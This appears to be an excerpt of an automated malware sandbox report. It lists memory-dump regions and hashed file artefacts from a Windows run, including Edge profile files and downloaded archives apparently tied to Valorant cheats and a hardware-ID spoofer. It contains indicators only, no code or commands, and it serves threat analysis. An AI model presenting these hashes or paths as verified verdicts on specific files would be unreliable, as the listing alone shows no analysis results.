memory/3784-2887-0x00007FFAEB810000-0x00007FFAEBDF9000-memory.dmp
memory/3784-2888-0x00007FFB01930000-0x00007FFB01940000-memory.dmp
memory/3784-2889-0x00007FFAEE7E0000-0x00007FFAEE803000-memory.dmp
memory/3784-2890-0x00007FFAFE610000-0x00007FFAFE61F000-memory.dmp
memory/3784-2914-0x00007FFAEAB10000-0x00007FFAEAB3D000-memory.dmp
memory/1704-2913-0x00007FFAF0AB0000-0x00007FFAF0BCC000-memory.dmp
memory/3784-2915-0x00007FFAEAAF0000-0x00007FFAEAB09000-memory.dmp
memory/3784-2917-0x00007FFAEC4A0000-0x00007FFAEC610000-memory.dmp
memory/3784-2916-0x00007FFAEB7E0000-0x00007FFAEB803000-memory.dmp
memory/3784-2919-0x00007FFAFE620000-0x00007FFAFE639000-memory.dmp
memory/3784-2920-0x00007FFB06110000-0x00007FFB0611D000-memory.dmp
memory/3784-2922-0x00007FFB02100000-0x00007FFB0212E000-memory.dmp
memory/3784-2924-0x00007FFAEA770000-0x00007FFAEAAE9000-memory.dmp
memory/3784-2926-0x00007FFAFA6C0000-0x00007FFAFA6D4000-memory.dmp
memory/3784-2925-0x00007FFAEE7E0000-0x00007FFAEE803000-memory.dmp
memory/3784-2923-0x00007FFAED470000-0x00007FFAED528000-memory.dmp
memory/3784-2921-0x00007FFAEB810000-0x00007FFAEBDF9000-memory.dmp
memory/3784-2928-0x00007FFAEB810000-0x00007FFAEBDF9000-memory.dmp
memory/3784-2941-0x00007FFAFA6C0000-0x00007FFAFA6D4000-memory.dmp
memory/3784-2954-0x00007FFAED470000-0x00007FFAED528000-memory.dmp
memory/3784-2953-0x00007FFB02100000-0x00007FFB0212E000-memory.dmp
memory/3784-2952-0x00007FFB06110000-0x00007FFB0611D000-memory.dmp
memory/3784-2951-0x00007FFAFE620000-0x00007FFAFE639000-memory.dmp
memory/3784-2950-0x00007FFAEC4A0000-0x00007FFAEC610000-memory.dmp
memory/3784-2949-0x00007FFAEB7E0000-0x00007FFAEB803000-memory.dmp
memory/3784-2948-0x00007FFAEAAF0000-0x00007FFAEAB09000-memory.dmp
memory/3784-2947-0x00007FFAEAB10000-0x00007FFAEAB3D000-memory.dmp
memory/3784-2946-0x00007FFAFE610000-0x00007FFAFE61F000-memory.dmp
memory/3784-2945-0x00007FFAEE7E0000-0x00007FFAEE803000-memory.dmp
memory/3784-2944-0x00007FFB01930000-0x00007FFB01940000-memory.dmp
memory/3784-2943-0x00007FFAEA770000-0x00007FFAEAAE9000-memory.dmp
memory/3784-2927-0x00007FFB060E0000-0x00007FFB060ED000-memory.dmp
memory/5520-2981-0x000002597E700000-0x000002597E708000-memory.dmp
memory/1704-2991-0x00007FFAEDDE0000-0x00007FFAEE3C9000-memory.dmp
memory/1704-3003-0x00007FFAEEE40000-0x00007FFAEF1B9000-memory.dmp
memory/1704-3002-0x00007FFB01B00000-0x00007FFB01BB8000-memory.dmp
memory/1704-3001-0x00007FFB01BC0000-0x00007FFB01BEE000-memory.dmp
memory/1704-2998-0x00007FFAF1410000-0x00007FFAF1580000-memory.dmp
memory/1704-2993-0x00007FFB06200000-0x00007FFB06223000-memory.dmp
memory/448-3092-0x00007FFAEC390000-0x00007FFAEC979000-memory.dmp
memory/448-3094-0x00007FFB0A450000-0x00007FFB0A460000-memory.dmp
memory/448-3095-0x00007FFB062A0000-0x00007FFB062C3000-memory.dmp
memory/448-3096-0x00007FFB0A440000-0x00007FFB0A44F000-memory.dmp
memory/448-3101-0x00007FFB025A0000-0x00007FFB025CD000-memory.dmp
memory/448-3102-0x00007FFB08860000-0x00007FFB08879000-memory.dmp
memory/448-3103-0x00007FFB02570000-0x00007FFB02593000-memory.dmp
memory/448-3104-0x00007FFAF3930000-0x00007FFAF3AA0000-memory.dmp
memory/448-3105-0x00007FFB073F0000-0x00007FFB07409000-memory.dmp
memory/448-3106-0x00007FFB06290000-0x00007FFB0629D000-memory.dmp
memory/448-3107-0x00007FFAEC390000-0x00007FFAEC979000-memory.dmp
memory/448-3109-0x00007FFAF3D20000-0x00007FFAF3DD8000-memory.dmp
memory/448-3108-0x00007FFB01A10000-0x00007FFB01A3E000-memory.dmp
memory/448-3110-0x00000255C6B20000-0x00000255C6E99000-memory.dmp
memory/448-3112-0x00007FFAF2DC0000-0x00007FFAF3139000-memory.dmp
memory/448-3111-0x00007FFB062A0000-0x00007FFB062C3000-memory.dmp
memory/448-3114-0x00007FFB019F0000-0x00007FFB01A04000-memory.dmp
memory/448-3113-0x00007FFB0A440000-0x00007FFB0A44F000-memory.dmp
memory/448-3117-0x00007FFAEC390000-0x00007FFAEC979000-memory.dmp
memory/1704-3151-0x00007FFB06200000-0x00007FFB06223000-memory.dmp
memory/1704-3149-0x00007FFAEDDE0000-0x00007FFAEE3C9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 311cf6edb71cc2358054f0d3497e99ad |
| SHA1 | 29c385e7be7b73221b1326b5fc37df298869bd8c |
| SHA256 | a3865ec0575be3883a1cea9d041ccb78fe7cccc9cae2711f2016a438030cf50f |
| SHA512 | fa5ef698d1b3eee17c74ce7f00ad90f36ea50362e40926c6c4f6ca1719585cd6d77bbe5347f1f47150b3c8ee4348f9711cf52cc54337ea534a4df016331629a3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 4ad0590f28cead0eec1a579bb9bfae93 |
| SHA1 | a567c1bc58e9c81a1715afe776acb6b366659b96 |
| SHA256 | 27d39d9553a2693f8c96a03fb446b22dcf527df7abf518548aff36258caf0f06 |
| SHA512 | e03b9e7e4b74337370b2f90d75d6e31bbc01c88d7e9cf92fab042c8add66c0b63f2a613f67f37e044ecbb521785e3fe30814b6e2264d93caa397744b6fcc4f14 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 3b7225d081c9d0320bb74140ad9b8c17 |
| SHA1 | 3d04826f53fc4e45a27f72a621af70d36cd1f251 |
| SHA256 | 8e06fb910376e394be255a4f5d6455c3eb6829d407c122009a6fa5fecd69ef47 |
| SHA512 | 3d6f28baace0c265ea3c570d377c8a147bd9b9d17bcdc1bb53dfac2f34552d1c0e4649a4b77689e7ae0ebb78fedf60f9e835efaa9e9e4a2bb908f7e79722240f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 5d45d1ac10081c64406f7084b38f9cfe |
| SHA1 | 53b17b41668e3609738eafb81d85c7c6b51e3648 |
| SHA256 | 57c62f803dc368846bf060913cbb6bd31227d144c7b0e54112d30a41e5cfb440 |
| SHA512 | e1f901b5a85b82133d96cad04964649a5a9deed0e1456bf21b93fedefb70602c53e4633ff74627b1fef98b3de037cbc15fdcc073dbb7a07832b2b3051b9a96d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 868ee306ff5b455823c3ba49e51e4c2c |
| SHA1 | 53eea47a24e08c68174986c0ec706ab3562b0d19 |
| SHA256 | f2d37d356a4c156c13f940b5f7be5a3fe59af08d828e585a71a37a14595e89f6 |
| SHA512 | 9d0e4aaadedc77d671acf1e296e8f5f5f0106134689994dc153e7677afd27d9f50f050e04c3e04ac15e0281540ac92de7f2b92fa18eb6f3ad09312ae093920a9 |
C:\Users\Admin\Downloads\Valorant-External-Valorant.zip
| MD5 | d1fa91be29717298602e3b52ddbe4511 |
| SHA1 | 63a3228f150f6dcaf250033f93e8774af335cb1e |
| SHA256 | 4926663906dd071982d35b0cfb77fc5d949f5a3e54588c05f6b157816fb3ee27 |
| SHA512 | 53c4ffcca572814a851e911b4697208ce0b4695a9b4d1e4b5221b0e367b1f6be7c071a36af7c0dcc88a00cf764b64a0b735eb63b11a9cdc5dbd4006e7da3f2e2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 91c027a41fb195a90856eeb12ecd458c |
| SHA1 | 624af1dcefa013a0551c194d1218cd85adc5cb51 |
| SHA256 | 81ce65af215c0be424a65363f9bbf9b0e202d7811283374f399094c4bf59c062 |
| SHA512 | 1e7961e45712d2100a1c1a2f2403ccfcd0c1111641c7b2a04d9b64c003150cb83259640b9ffc9cf84ae7c0dbfcb52cd6326d632b8b2094c595769364c80e10f4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 9c76833f9dd02020f63a1a8664f5054f |
| SHA1 | 67c3bc19b4041443e78faacdd70f5977b2ee038c |
| SHA256 | 869598a67cd8a7bb8413c5de29679d59ea4dee9f67b5a67fbf631cd4f0cf7f48 |
| SHA512 | 02f9fac7eb22af3a7de3be3e207cfbb5fc27145cfad7b898f0addf6970a269a36261ec763b359c62975072b7f2eb6d27a514f81c3c048625c0687633bc087b2e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 9c201644c4651b620cef0ce697667de4 |
| SHA1 | 0ab7504ccb3c6d5d2b100866891e6e595d219f69 |
| SHA256 | 14fcf97c2d4a8261f232b5a92234727b06535d8b94a99db7d59ebeb56f7e1cc5 |
| SHA512 | fdf1293b0838921bbc99b2f01d79c6840711f3316a515dd150ed6346d1c438e7dcea01950a0e6062aa9d810a86de9d7248ab0d7735487f32204367a43f733a85 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 21af08588e2a4609f81bbf73383a8d56 |
| SHA1 | fbeb343088a00bacc60f61227ed0f862d7dc1d7b |
| SHA256 | 8eed665a93afa368c6364a0e5d3a194f4ff401861774cd2bbaa4a433df517274 |
| SHA512 | 7207405a043666fa2a3a4d2ae4cba56e2391a67bdbf1e1eb0a301bff6e5151db4a7d869e8b90e5dda7baabbee4cf0f766db5e032679ca542983cd2a78e20ca00 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | bf9e7d7c6770ac96040da676e908228e |
| SHA1 | 04c2859d912af737cc29ef76c4b395f47238f0df |
| SHA256 | e025c50d3eafd19c880c31ce86c416b4e95480cd559e465d0407ed34e19e7822 |
| SHA512 | d1a3e993b4d2563e162fda90f2a0cf15ed662a00b12ad2c96955d6199e8e2b338b0f05618510e5b9a15cd119ad7aec7f25ecda1627e1ce824fa078236c930811 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | b0c40cabff57a712d4e7a3198dcfcda9 |
| SHA1 | 6877bbf609f8fb83ebe7a10a2a91ea059f48cf68 |
| SHA256 | ad3630b39dc2aa4d0be98e987a69c8e83b67bcb204ce4eeedaa86aa5a0996a9b |
| SHA512 | 0a1351b73c84d848ef98ed1786dceddd19b0aff2aba22ba653ee5e360a8dc5d4fa8948b642cefafc98b082123f2d33650ca5100adf0c84777b3c886e7f6d05b8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1c846f8cd73664a39b13ea98e339255d |
| SHA1 | dcf517d53fec651bf4f15e3331ef87d3043ab5d4 |
| SHA256 | 78883ac9622c610d2e5b651aea20d27f4f9bbe8a9be9e2452ad37f0029afa6f4 |
| SHA512 | 52718445b81e7e9272b4ee484194d0b3538e0964934ea936512eedf4095b184f8bc7b617d4ed8a84a28f55fb556f690e5c5b0112a8d2cb121984d81057e2495f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 73a2abf205204f742bcb5564bceb775b |
| SHA1 | 8bf447be9eb963ee5ff24db40039af108b2d0243 |
| SHA256 | c7e35dcdc1deaa506b4ce7180e1ef112db14cc31b0fb202d38fad1a563c67607 |
| SHA512 | 846510afef225b6ec0ff3ba802dd99d4ff7741d888045283ecb241851d24a77a51621cfe4b017f30785498fe331a0ab19f62618fe13838ad756e64af1a935ac8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 930d8aef59f482a4d8e3e433637bff94 |
| SHA1 | e371adf0c9c2dfcb8d494539fff96b7e5d075d72 |
| SHA256 | 96147a31521b98415c4b19f3c78a7c2eb3f3a2f74b6c8ec2dae1dbaffabaaa10 |
| SHA512 | 262d5f0b901c39c8a648160aca5b6ce5ed7268eb2204615975e435a0ebe35c0497527cbd8f7be8a8a51997eab033c03cbb5e1658ab436780dc197f2212036e8e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 31c48ae6abfd7d8f145127e125e33297 |
| SHA1 | e9a969cc12efa526d73ca5a54517e4319b548df1 |
| SHA256 | a102d03351148c1f3e32600f58cc4602dc7c76742e467b9a658e38adf8c83c7d |
| SHA512 | c9644b2e89727b2ac214c506e9de51a8c04f1b4433bdce1facbd15da1831e2922aeebed8df1fea4ee52a8a2e3aec762541acbfa2a3acb66363b410735d19cc22 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 09966ca0b9b51b3ff531d09c3d42c05e |
| SHA1 | a12e54bc8cbc7d68cac083fd0db3de60b32c995c |
| SHA256 | 15f3fa93aac818ec10a875eadde0eebeea0bba3c54d973df3e802c810670e878 |
| SHA512 | b0158a92e5ff9513ada49eb1210bb165d736f8293db939cc4731e62d491ffbf24c1db3eab29fe404f2376adb743f797b7aa0755bf50cee3cfb5599398d3af6d8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | bea9e8f6c9abf45e5e9378d1f4768bd2 |
| SHA1 | 6a404d4a2a7a5728b4f6052ca5ff39bb3a116729 |
| SHA256 | 4c1abe535cfbcd3b243270065f17981607340f26859734c28befe9f4031619b6 |
| SHA512 | a38f0ea096818bbc566fd24d2b257e08501dfaf3debb885f99be7faec4ee38c22f033efef2b43485cdd1baea89ca744cef6db7cec1982b3c0cff6bc2669278a4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 9bf6cef47d5cf02d4175a420fd7e2638 |
| SHA1 | 5afbe66c12d5b5eadadf301d7aaf4b39693708c9 |
| SHA256 | 6e90cfe4aeb95786d914cca33ff3f81def946c3c915b61389a5ec65189f644e3 |
| SHA512 | 4457554ed995d34b3f9b61419deb623c87d9b482b24c0ef3ce57a33fbfd0dbacc95a5d50dfa6f66ceec1149b0468bf0b063c4feb442cdf1a83ffa760b5388449 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | 834206b098a2981d9ea8902428b02395 |
| SHA1 | 22483df0ad06718571b064f672d025b7209c3e0f |
| SHA256 | 5fcf82f988b843c8b063ac17f34068042747ff75b6b794963e315565e2605b2b |
| SHA512 | 3657b10f747890770083c78fb515e18a6ccc8c08efebae86eb597b894446908a1a4e22ad89ee4ee5e04297df6ea8074300925590e8c03e12381d10beb00f45d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | b539040409b8c47c1522c27750c93b4a |
| SHA1 | d1ce87059e5d8795b560dadad41430907d9c892c |
| SHA256 | a4c3a9a3f1933024bce22be7312bff91a7411822831969dbc574abf20f0f8237 |
| SHA512 | 83ac177bfc2f6f135381ad1769cd61ba3fef5670d270c691f8cd9ff46b2e3afddcc8e385988f58840160cc87a15de917840ff8671c1d02cc17a379fa9d907bc0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00008a
| MD5 | 161f1abb339980f390daaaf38c86341e |
| SHA1 | d7339d1c9751de00fd8e6e9c45ffe81c6fd47edb |
| SHA256 | c1246e454fad372ebe4d10999ecee70856c110c14a07b581081607697338aadc |
| SHA512 | 7e04974f361f9ad77d72aba1b2b87e563e76650b2dfd29528b395800eafb95650b35b245c09314f0d21b5300ff3b40bb27885524cb57dcd05d10518f2afacc1f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | ad97d0158238e88f66abbddaebe69e9c |
| SHA1 | 0e073e64ea1adc6870445f4e3b982a3dfea6e91f |
| SHA256 | 6224a591aef4b861ad5f716ffdd9ff5afecbc5419ef2369e7897aeef599c6e03 |
| SHA512 | 4b25aab91a43b888c4c3e2a195c0d8e96ec1da1abbe9a56a61e60f8ec2b10c306c98afae26bf16118b83aeeaa7e38c785414c7edfb744ce28154fd7e4baeb165 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | aa56ccaf9b42342915530c1e8c10ac45 |
| SHA1 | 3aa1f1a25258f62e83918eb37ed6df968b7d8d53 |
| SHA256 | 2a814b96edabfe001566a9af1a6e0fe0663c92a35561c72cf7037affdbf3fc55 |
| SHA512 | a1318d5a92f824f0a55990f19352536d5599268e0b712ea7b99f95e9d9bf9360387749f2f12353f6fcf008b4f910b74371e631e7d1f3dbb3e8d6a22a246102c1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 861d0c5b8742c2a8cdd74438fc707596 |
| SHA1 | b81cf777b7ff5265cd76f7de6a17f48bf17a4572 |
| SHA256 | b92816fdb6506a964044d189be452b9efd1a6f2a781f250a0ec7b52d44f442b7 |
| SHA512 | fb339d4116c0cf534b6be0d89f63a12db2349d3fc5b06a0165812ff9908dab2f5294dfa08a1ff239d6ecad1227c426d4f69a293ef1074ce19ffce1645b672944 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | e7f2f132f648eb9a5facb1db3b55b62b |
| SHA1 | 347a4d0e887f7245ca5bd76d354989f396ce4a83 |
| SHA256 | 32fb5209282f5c8ea16a944589c1446932d261257050893c4e2c57d88ddf0858 |
| SHA512 | c30a4a4e8bce16015bc18b9c2cbacd067a2393b38b9a8ed23127bb1c427f094f9492f58478752f97a84ea5180f0a69bd50240d8ad9755b1c74f78679fe48ee6f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 23020d894274d3d1172b6b0b8b467419 |
| SHA1 | 630a16ef801e3c17a3a451aea4b26f6fd29449a1 |
| SHA256 | 62b3e6c1fd8a825fb65eecbd4aae4fb7be63e9feb05ee2fea56bb416711cf141 |
| SHA512 | a148f4427507ed37602f88cbf142bac208d1c51733a5b0b3bf210160271eaa2a4fa5a0208597a49a0c3053dac7d762386c2b63d45e15ddfada5fddda4911ec53 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 73fd6fcc4770f9d3d42396852a54e447 |
| SHA1 | 6ab1e596e3649e668e0f97c6e4983d4fc6011790 |
| SHA256 | 8cd092d37eb4cb04675384f05b99633367f29775aabf16e131741616a49ebee9 |
| SHA512 | 1c0e603c6620b4a4f5bf2992ef19e3ab251369a3909d8e746d2e53e9b7e7615c0a609eee17e62042d324b8e51a2192610af4cda1996c9470494734d5abc870c5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 29748fad0687d778441f6da428cdba5e |
| SHA1 | c8b440dfe1669939933a5cabad7b0d0c799607d7 |
| SHA256 | 31078b2b7469188f76bced5a2db82582386073bbfda379392e1ebf91aa24976b |
| SHA512 | 0e3d182ec7943dd509ec0a2f3471afa1e2ab07e7b114c08b66863f98681ad5b74c4b922f9c4f39867f3762d7708aa0b5722c3df05d2650b1d60d0142c741cb24 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 4a2e24581c4bc88d4efd38c8a49be167 |
| SHA1 | ca32547d0957e9244da67c742d4469d95e4fbead |
| SHA256 | 38f7fd418c007a69c8ffbe806e7c7be90b74050505488f8d4804bf3a8ee81b2a |
| SHA512 | 72a7b4f33be25a3023d15b1cc126b0ae260b1be27dede0d0fac7b48f6a2fa87def409f62e521d76f7500da7595f9bcbf57385f84d71fa4d4fa1a865e5aa10bc8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | f791be201fa9c8ce9380026722ecd545 |
| SHA1 | 268e15e0297fffd0db8e11f15114e234c08bc924 |
| SHA256 | 23f80997ca8de4264c2d597d704d0a90c90e3c5679bb68f5b0ba8b503e4f481b |
| SHA512 | c5be2dee6019b2a8a7217c278fb5a11e4c165fa2eca1d0905ef0386b5cc2fb6baadcf98bb2f06513bde17f47e07699db2d49a55b6658a82534b9ba19f5b48685 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\Origins\MANIFEST-000001
| MD5 | 5af87dfd673ba2115e2fcf5cfdb727ab |
| SHA1 | d5b5bbf396dc291274584ef71f444f420b6056f1 |
| SHA256 | f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4 |
| SHA512 | de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | dfa57e8bb0e9da3c1d0b6bc5d0544b52 |
| SHA1 | 9a3272de4d45690c1e6affad968dff094703b4b8 |
| SHA256 | 3694aaa33a1da298fb701e768ba770f995f3cec1e1033dbed5522eaf367b3216 |
| SHA512 | b1df3861c32bf548ef93797f62f6ae339d273637bcbf8da907f196bdeefc1f86fc74c29cc1e397a98ece14845460454f49ea0bf5f7dc1d7222e676e918226963 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ff8e1b3fe16a7a82bf9a27ea5321b9fc |
| SHA1 | 129ed235ce0e386ae160575e52e8c16927d60d96 |
| SHA256 | 0f5a5bf805b94502bf30accd9362a1e53bfdf3b21ee63a8b076498ba45d09bbd |
| SHA512 | c0c3a5a5ed71410cf716ee641fa1e220fdd89bc4571233cf80d7ebe1f488c905af5b17954b0d30826856ccab2d1946717d5920372aa465e9d55bc97df311e1e5 |
C:\Users\Admin\Downloads\Perm Spoof.zip
| MD5 | b6abb640438167ec29b689e59ad8017e |
| SHA1 | e2a31bcf56cb3a725a73b6928fb840b7f2d3511d |
| SHA256 | da16749d66e5ce0248cd56767aeb5f3620cacac0f86a83f0a78c8c7a176397f9 |
| SHA512 | b32a40af3722caf93106f5b1d9b0ccae921536eae85f1de6b932eead0dc06a4fef88047a5372bdaac5eecec5812cb4c2271bf4be3f197d6d3e9f788ab22e8e13 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | fa366319f132a3dd1e60221302675f14 |
| SHA1 | c85af99a416b1e921b39e1969df6cd7ae4e3f3a7 |
| SHA256 | 001cba68e9aa5c71af1bf2de9fbc0a958bc1ce896c12b4caab9013ebc8c743e8 |
| SHA512 | 0423622721f346ad8dbec27b949298d7faaf82c4908d1687686634f4afde888860bdc2ff171abdde27011692ad15a103fcd05c06213fa6c576625009dd4aca32 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | e907beeffd78cf0cce54f7ede22ee3ec |
| SHA1 | 5ff97e6e312ba70157820e0cf35044d9c66589aa |
| SHA256 | 8e585117ce74d1928b1d750f2b0bc5467c47144723beaf1bb2fc572d1ae9d80e |
| SHA512 | 0611725ee77ea47be69901e527f23aab15e839bcc41a84c0da9ca14b947e864defc2ba5c778b9a7c650b4ffbf65071f79b9e054b58e6a52d3b3c4daf48e0f342 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | bdbab2092857f5b0cb9889d9b5e8edda |
| SHA1 | 8d37605a9ae97dad6af6eadfd9e7d09e97fead0b |
| SHA256 | 93f35bf2701819f76eab6bdf67e8c1232ec0911fdf5c7d76b82fca34af43acc5 |
| SHA512 | 48165eb039d649b28ff7c4cacd1d94ed3997963db825d5e73de81602f2bb43df8529cbb5a7e22eb2496c5e04b61ef273d4d5ca76eb2ebb2a906478d1d0722d23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | ab960ff564deb86f3e74182932f57c96 |
| SHA1 | 9a2527ffb305533b9bd44b0eb534c08326ac2b3c |
| SHA256 | d7316df5a1453276d8cdb4bdb19087c5d0d3f145e430800810b0dbdb586ae076 |
| SHA512 | 8af9bb2f3141a1ec03ef599dab9720dcedf71e26f62bdae5fa8d11bc232acaac4d80f52ef411e43ac7073a598c4b96abd977fb44a5d8b1d23b6514ca953ecce9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | d3ea0ec07549eb1f17d01557569696f7 |
| SHA1 | 3b6422b4816c8f55fe46b9193236fce175cb3284 |
| SHA256 | 70a0b8e6284fad98b71fcf886a6317671551c7bf203598822ef763c89c3c4628 |
| SHA512 | fce3240312d8c8deef85a8f365100166bca23f94a2cdc1d235559dac185a4bc40ccd44d489b6346348ac39a022e00433e863a5c8faa55e03bc294ef1531a1696 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4320371fd4ae660412de825f96b5a723 |
| SHA1 | f21513d2638bffacb921222fdf2961097faec8db |
| SHA256 | 7853ab914034460bd5a19eebaad2057291c2512444a53478ce382905c5ce5226 |
| SHA512 | 6f383ae944e5c3c5283ccdbe74a037ef7bff90ff77c2bc4043b0fbf1250952b8ffafdc8a7cce32cae2f67bf38fb972e45964b39b477c191e3dec547006026715 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | 5a6054a9613d8a9286a8a52a106ad18f |
| SHA1 | 3864f6c9986b94c3043c7fe74908c9bf883fe311 |
| SHA256 | 64573163326bca764c1d9afd6a304017b26c0fe178a2ad7d5bdd436273e1923c |
| SHA512 | cab0f064557d32529e7cdda4a944bff181526a3d32018c61f32902858706578850a90acdf5f8aa516cf1ef5400f4431454b84657e7d662ad54901ff2839274bf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | a23469f12e372d0a3446e128c26d65a0 |
| SHA1 | 4f80adadc15164d47b2c0d087d7e8acab7192000 |
| SHA256 | 8724b8d153f296d3b1ae93af2b351d8b41b9cdfa2883b8e0a9cfd9f1ed5862c6 |
| SHA512 | 6cf25c8f4aca9c8c800a60d6b612da545704dc1cb3f056cbb3fc121c32878b834844c60faf2f51050cc2c406ed5b6ea95d921ae791ebda78b35be3fe6a64946b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 048e177f33566fa7497bedb75d83f004 |
| SHA1 | 7be99d11a4482fc7acd7307668cedc70f537996f |
| SHA256 | 44827b220d5c17c5d6ca112fe9a33907b09635c77c750b49b003a130c5a7e0fa |
| SHA512 | a8f3943db200a1017a407f5ba98a4b6ae403c3e3b954317d5528bf084cacfff21bce8c05291a0ee20afcd60f8ab62e98647c9a48335f5f32f138f9b55f35a9d5 |
C:\Users\Admin\Downloads\Valorant-AHK-Scripts-main.zip
| MD5 | 2da2db6b55e198bce55369b2bf997919 |
| SHA1 | f6067abcf71551ac972e195bd73137543bc4da5e |
| SHA256 | e98a82a604319e757847e8b1552bc47fa7019ba5a7d7201355dc7052d051d905 |
| SHA512 | dfb78331b6ddcfe9bb662d3bae27e6bb57c521f81d7558c6a8b8576dd64261365d3860e913b2ee98c25bfbc962d914285c6610a83ba889e9bd7005d203634db5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | ecfcf65649ebfdfd8823873311cddc66 |
| SHA1 | 265ae8c1da1331b2d62da6057e231c6050b7cb4b |
| SHA256 | 022fc64f800e30a0c10fc2d7e3e17f1966ae45dde133fcd0722f79c3d396a853 |
| SHA512 | 59e190b6230decb911226dac6568e194ef0528784b23414e0294f297bef9ed0c78051cb2978529548691164b540b317d57b3ffa81a35131250c60b5e1e96ce90 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 9e1faa285d79622ac7b3065a5cb3b560 |
| SHA1 | 62fd84018080a51b760ed483e2f5743ff91b4168 |
| SHA256 | 1f29583c24f3c144ac146a80a77aca7bbf3100a3bcc85761c86b73eac48f29a9 |
| SHA512 | 60a84a7360c7f23918a0ebf6cf729274805e960875dfa1139d46c7ede535e8068338b6d1b056ef4e3c0a631b0efa2751c20108d38d986f6eef930f2f4aacf540 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | ee151fe8f5a411e72720ca53f4e361f6 |
| SHA1 | f29df1fd0cb26c80ddf745e4ce281eabdcd08bc9 |
| SHA256 | 1b80ab3daa61befc76e632720b016841e4ab7a9d04f24a49bff112c6682bcdc2 |
